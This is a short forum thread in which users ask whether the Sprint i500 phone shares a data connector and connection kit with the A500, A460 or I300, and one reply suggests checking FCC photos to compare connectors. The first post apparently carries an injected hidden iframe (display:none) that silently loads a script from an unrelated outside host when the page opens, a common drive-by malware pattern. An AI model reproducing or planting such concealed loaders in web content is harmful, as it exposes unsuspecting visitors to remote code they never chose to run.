+ Reply to Thread
    Master

Will the i500 share the same data connector type for....

connecting the phone to a laptop computer? Will the A500 cable be compatible?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Master

Re: Will the i500 share the same data connector type for....

Originally posted by mattmcg
    connecting the phone to a laptop computer? Will the A500 cable be compatible?
    To further clarify, will the "PCS connection kit" for the A500 and A460 also be compatible for the I500?

Master

Re: Re: Will the i500 share the same data connector type for....

Originally posted by mattmcg
    To further clarify, will the "PCS connection kit" for the A500 and A460 also be compatible for the I500?
    Or perhaps the I300 wireless web kit will be compatible? It seems the connectors on the bottom of these phones is common. Anybody have any insight? I have a feeling that Sprint with the new Vision plans will be discontinuing sales of the data connectors as people will look to hook it up to a laptop and abuse the $10 dollar/month unlimited Vision. Best to get it now!

connectors

I don't know what the specific connectors you refer to look like. If I wanted to find out their compatibility, though, I would go to www.phonescoop.com, find each of the phones you're interested in, and follow the link to the FCC approval documents. These documents have photos of the phones from all angles, inside and out. You should be able to get a good idea of connector type from these photos.